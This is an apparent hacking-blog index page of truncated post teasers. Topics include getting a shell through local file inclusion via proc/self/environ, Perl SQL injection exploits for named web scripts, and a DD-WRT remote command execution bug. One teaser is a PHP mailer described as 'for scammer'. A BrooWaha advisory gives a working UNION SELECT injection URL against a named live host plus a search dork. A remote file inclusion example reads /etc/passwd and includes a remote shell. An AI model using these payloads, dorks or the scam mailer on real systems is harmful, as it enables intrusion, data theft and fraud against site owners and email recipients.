Shell via LFI - proc/self/environ method (step by step)

This article take from http://h4cky0u.org/shell-via-lfi-proc-self-environ-method-step-by-step--t1101.html , so enjoy this article, only for education, thanks for SirGod contact person : sirgod08[at]gmail[dot]com1 - Introduction2 - Finding LFI3 - Checking if proc/self/environ is accessible4 - Injecting malicious code5 - Access our shell6 - Shoutz>> 1 - IntroductionIn this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities andinjection malicious code in proc/self/environ.Is a step by step tutorial.>>...

Read More

How to Protect an Email Account from SPAM

Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.What is SPAM?Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited...

Read More

php mailer script for scammer

!-- if ($action=="send"){ $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?> Your Email: input type="text" name="from" value="" size="30"> Your Name : input type="text" name="realname" value="" size="30"> Reply-To : input type="text" name="replyto" value="" size="30"> Attach File : Subject : input type="text" name="subject" value="" size="65"> Message : <? print $message; ?> To : <? print...

Read More

How to make a Backtrack 4 Hard Drive Installation -

Backtrack 4 does not contain any installer yet thus we wrote this step by step guide based on muts cookbook on how to install Backtrack 4 on our hard disk drive.Step 1 - Creating the partitionsFirst we will need to create three partitions to be able to install backtrack on our hard disk drive. We will need boot, swap and root partitions to be created. (We can still create...

Read More

Ed Charkow's Supercharged Linking Blind SQL Injection Exploit

#!/usr/bin/perl#==========================================================================================## # [o] Ed Charkow's Supercharged Linking Blind SQL Injection Exploit# Software : Ed Charkow's Supercharged Linking# Buy Script : http://www.infodepot3000.com/Scripts/content/supercharged_linking.html # Author : NoGe# Contact : noge[dot]code[at]gmail[dot]com# Blog : http://evilc0de.blogspot.com## [o] Usage# root@noge:~# perl link.pl## [x]============================================================[x]#...

Read More

AJ Auction Pro OOPD 2.x SQL Injection Exploit

#!/usr/bin/perl#********************************************************## ## [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit ## Software : AJ Auction Pro OOPD 2.x ## Vendor : http://www.ajsquare.com/ ## Author : NoGe ## Contact : noge[dot]code[at]gmail[dot]com ## Blog : http://evilc0de.blogspot.com ## ## [o] Usage ...

Read More

BrooWaha Engine 2.0.71 SQL Injection Vuln

[o] BrooWaha Engine 2.0.71 SQL Injection VulnerabilitySoftware : BrooWaha Engine 2.0.71Vendor : http://www.broowaha.com/Author : NoGe[o] Vulnerable fileimage.php[o] Exploithttp://localhost/[path]/image.php?id==[SQL][o] Proof of concepthttp://london.broowaha.com/image.php?id=-5851+AND+1=2+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),1/*[o] Dork"Powered by BrooWaha Engine"[o] Noteif you dont see the result, view the page source and you will see it. :)the result from the example above will be like this after you view the page source.4.0.27-max-log:db162098511:dbo162098511@74.208.16.88/-5851this...

Read More

DD-WRT (httpd service) Remote Command Execution Vulnerability

This artikel take form milw0rm, for more information just look on http://www.milw0rm.com/exploits/9209This is a remote root vulnerability in DD-WRT's httpd server. The bug exists at the latest 24 sp1 version of the firmware. The problem is due to many bugs and bad software design decisions. Here is part of httpd.c:859 if (containsstring(file, "cgi-bin")) {860 861 auth_fail = 0;862 if (!do_auth863 (conn_fp, auth_userid, auth_passwd, auth_realm,864 authorization,...

Read More

Remote File Inclusion

Take a look of the following code:!--php [...] include($_GET['pag']); [...]?>As we can see, $page is not validated before being used so a malicious user couldinclude or call (as you prefer to say) his script via the browser and gain accessto the machine or view, as before, a file.Example one: (gain access to the machine)http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]Example two: (view files)http://remote_host/inc.php?pag=/etc/passwd PatchingThe solution? validate the input. One of lots of methods to validate inputs...

Read More

MAXcms - Databay Content Management System 3.11.20b Multiple RFI Vuln

[o] MAXcms - Databay Content Management System 3.11.20b Multiple Remote File Inclusion VulnerabilitySoftware : MAXcms - Databay Content Management System version 3.11.20bVendor : http://www.databay.deDownload : http://downloads.sourceforge.net/micro-cms/microcms.zipAuthor : NoGe[o] Vulnerable fileis_projectPath parameterincludes/InstantSite/inc.is_root.phpGLOBALS[thCMS_root] parameterclasses/class.Tree.phpincludes/inc.thcms_admin_mediamanager.phpmodul/mod.rssreader.phpis_path parameterclasses/class.tasklist.phpclasses/class.thcms.phpclasses/class.thcms_content.phpclasses/class.thcms_modul_parent.phpclasses/class.thcms_page.phpclasses/class.thcsm_user.phpincludes/InstantSite/class.Tree.phpthCMS_root...

Read More

MySQL: Secure Web Apps - SQL Injection techniques

-[ SUMMARY ]--------------------------------------------------------------------- 0x01: Introduction 0x02: Injecting SQL 0x03: Exploiting a Login Form 0x04: Exploiting Different SQL Statement Type 0x05: Basic Victim Fingerprinting 0x06: Standard Blind SQL Injection 0x07: Double Query 0x08: Filters Evasion 0x09: SQL Injection Prevention 0x10: Conclusion------------------------------------------------------------------------------------[ 0x01: Introduction ]Hi everybody! I'm here again to write a little,...

Read More

milw0rm Javascript Content Parser v3.0

Changes: *AJAX rendering techniques *Browser compliance! designed for Internet Explorer 6 & 7, Firefox, Opera, Seamonkey, Safari *The code is smaller, I made it too big of useless stuffs in 2.0 *The javascript does no more act on the page loading time if the source feed is offline or timeout, simply choose when it will load the remote feed by adding update_ModuleX(); anywhere on your page, preferably in the footer. *PHP proxy (this is optional, see post #2 in this thread) What is it: This is a simple javascript code wich you can copy and...

Read More